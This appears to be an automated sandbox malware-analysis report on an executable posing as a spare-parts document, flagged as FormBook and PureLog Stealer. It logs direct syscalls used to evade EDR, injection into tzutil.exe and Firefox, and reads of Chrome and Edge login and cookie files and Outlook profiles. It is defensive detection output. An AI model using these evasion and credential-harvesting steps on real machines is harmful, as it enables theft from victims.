                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0A5B mov eax, dword ptr fs:[00000030h]4_2_011A0A5B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0A5B mov eax, dword ptr fs:[00000030h]4_2_011A0A5B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123EA60 mov eax, dword ptr fs:[00000030h]4_2_0123EA60
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01196A50 mov eax, dword ptr fs:[00000030h]4_2_01196A50
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01196A50 mov eax, dword ptr fs:[00000030h]4_2_01196A50
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01196A50 mov eax, dword ptr fs:[00000030h]4_2_01196A50
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01196A50 mov eax, dword ptr fs:[00000030h]4_2_01196A50
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01196A50 mov eax, dword ptr fs:[00000030h]4_2_01196A50
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01196A50 mov eax, dword ptr fs:[00000030h]4_2_01196A50
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01196A50 mov eax, dword ptr fs:[00000030h]4_2_01196A50
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120CA72 mov eax, dword ptr fs:[00000030h]4_2_0120CA72
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120CA72 mov eax, dword ptr fs:[00000030h]4_2_0120CA72
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CCA6F mov eax, dword ptr fs:[00000030h]4_2_011CCA6F
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CCA6F mov eax, dword ptr fs:[00000030h]4_2_011CCA6F
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CCA6F mov eax, dword ptr fs:[00000030h]4_2_011CCA6F
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C8A90 mov edx, dword ptr fs:[00000030h]4_2_011C8A90
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]4_2_0119EA80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]4_2_0119EA80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]4_2_0119EA80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]4_2_0119EA80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]4_2_0119EA80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]4_2_0119EA80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]4_2_0119EA80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]4_2_0119EA80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119EA80 mov eax, dword ptr fs:[00000030h]4_2_0119EA80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01264A80 mov eax, dword ptr fs:[00000030h]4_2_01264A80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01198AA0 mov eax, dword ptr fs:[00000030h]4_2_01198AA0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01198AA0 mov eax, dword ptr fs:[00000030h]4_2_01198AA0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011E6AA4 mov eax, dword ptr fs:[00000030h]4_2_011E6AA4
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01190AD0 mov eax, dword ptr fs:[00000030h]4_2_01190AD0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C4AD0 mov eax, dword ptr fs:[00000030h]4_2_011C4AD0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C4AD0 mov eax, dword ptr fs:[00000030h]4_2_011C4AD0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011E6ACC mov eax, dword ptr fs:[00000030h]4_2_011E6ACC
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011E6ACC mov eax, dword ptr fs:[00000030h]4_2_011E6ACC
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011E6ACC mov eax, dword ptr fs:[00000030h]4_2_011E6ACC
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CAAEE mov eax, dword ptr fs:[00000030h]4_2_011CAAEE
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CAAEE mov eax, dword ptr fs:[00000030h]4_2_011CAAEE
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C4D1D mov eax, dword ptr fs:[00000030h]4_2_011C4D1D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01218D20 mov eax, dword ptr fs:[00000030h]4_2_01218D20
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01186D10 mov eax, dword ptr fs:[00000030h]4_2_01186D10
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01186D10 mov eax, dword ptr fs:[00000030h]4_2_01186D10
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01186D10 mov eax, dword ptr fs:[00000030h]4_2_01186D10
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011AAD00 mov eax, dword ptr fs:[00000030h]4_2_011AAD00
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011AAD00 mov eax, dword ptr fs:[00000030h]4_2_011AAD00
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtProtectVirtualMemory: Direct from: 0x77542F9CJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtSetInformationProcess: Direct from: 0x77542C5CJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtOpenKeyEx: Direct from: 0x77542B9CJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtProtectVirtualMemory: Direct from: 0x77537B2EJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtCreateFile: Direct from: 0x77542FECJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtOpenFile: Direct from: 0x77542DCCJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtQueryInformationToken: Direct from: 0x77542CACJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtTerminateThread: Direct from: 0x77542FCCJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtDeviceIoControlFile: Direct from: 0x77542AECJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtAllocateVirtualMemory: Direct from: 0x77542BECJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2CJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtOpenSection: Direct from: 0x77542E0CJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtAllocateVirtualMemory: Direct from: 0x775448ECJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtSetInformationThread: Direct from: 0x775363F9Jump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtQuerySystemInformation: Direct from: 0x775448CCJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtClose: Direct from: 0x77542B6C
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtReadVirtualMemory: Direct from: 0x77542E8CJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtCreateKey: Direct from: 0x77542C6CJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtSetInformationThread: Direct from: 0x77542B4CJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtQueryAttributesFile: Direct from: 0x77542E6CJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtAllocateVirtualMemory: Direct from: 0x77543C9CJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtCreateUserProcess: Direct from: 0x7754371CJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtQueryInformationProcess: Direct from: 0x77542C26Jump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtResumeThread: Direct from: 0x77542FBCJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtWriteVirtualMemory: Direct from: 0x7754490CJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtDelayExecution: Direct from: 0x77542DDCJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtAllocateVirtualMemory: Direct from: 0x77542BFCJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtReadFile: Direct from: 0x77542ADCJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtQuerySystemInformation: Direct from: 0x77542DFCJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtResumeThread: Direct from: 0x775436ACJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtNotifyChangeKey: Direct from: 0x77543C2CJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtCreateMutant: Direct from: 0x775435CCJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeNtMapViewOfSection: Direct from: 0x77542D1CJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeMemory written: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe base: 400000 value starts with: 4D5AJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: NULL target: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeSection loaded: NULL target: C:\Windows\SysWOW64\tzutil.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\tzutil.exeThread register set: target process: 6016Jump to behavior
                      Queues an APC in another process (thread injection)
                      Source: C:\Windows\SysWOW64\tzutil.exeThread APC queued: target process: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess created: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe "C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess created: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe "C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe"Jump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: xAbOwtcTtZmjBX.exe, 00000006.00000000.1862893892.00000000017F1000.00000002.00000001.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 00000006.00000002.2603005760.00000000017F1000.00000002.00000001.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2603510084.00000000014F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                      Source: xAbOwtcTtZmjBX.exe, 00000006.00000000.1862893892.00000000017F1000.00000002.00000001.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 00000006.00000002.2603005760.00000000017F1000.00000002.00000001.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2603510084.00000000014F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: xAbOwtcTtZmjBX.exe, 00000006.00000000.1862893892.00000000017F1000.00000002.00000001.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 00000006.00000002.2603005760.00000000017F1000.00000002.00000001.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2603510084.00000000014F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: xAbOwtcTtZmjBX.exe, 00000006.00000000.1862893892.00000000017F1000.00000002.00000001.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 00000006.00000002.2603005760.00000000017F1000.00000002.00000001.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2603510084.00000000014F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeQueries volume information: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 4.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.1938558348.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2603137890.0000000000F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2603506691.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2602984671.0000000001060000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2603358231.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1939504326.00000000014B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7480000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.401e790.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7480000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.401e790.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1391242614.0000000007480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1389196693.0000000004001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\SysWOW64\tzutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 4.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.1938558348.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2603137890.0000000000F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2603506691.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2602984671.0000000001060000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
